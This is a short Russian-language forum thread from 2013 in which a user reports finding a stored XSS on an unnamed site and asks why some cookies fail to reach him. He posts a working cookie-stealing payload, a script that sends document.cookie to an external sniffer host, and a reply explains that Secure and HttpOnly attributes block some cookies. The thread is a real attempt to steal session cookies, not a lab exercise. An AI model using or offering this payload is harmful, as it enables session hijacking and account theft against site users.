XSS не все значения куков передаются.

Discussion in 'PHP' started by zoke, 27 Apr 2013.

  1. zoke

    zoke Member

    Joined:
    5 Sep 2010
    Messages:
    90
    Likes Received:
    9
    Reputations:
    5
    Добрый вечер.

    Нашёл активную XSS. В целом, передача кукисов работает не полностью, 2 параметра со значениями не передаются, остальные (около пяти) успешно передаются. На сайте иногда используется https протокол.

    Код использую обычный.

    Вот он:

    <script>
    img = new Image(); img.src = "http://httpz.ru/nngi2kuk5mj.gif?"+document.cookie;
    </script>

    Этот сервис https://hpc.name/sniffer/

    Подскажите, в чём проблема? И возможно ли получить два параметра со значениями?

    Заранее спасибо.
     
  2. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    zoke Куки с атрибутом Secure - не будут передаваться на HTTP страницы. Куки с атрибутом HTTP-only недоступны из яваскрипта вообще.
     
    _________________________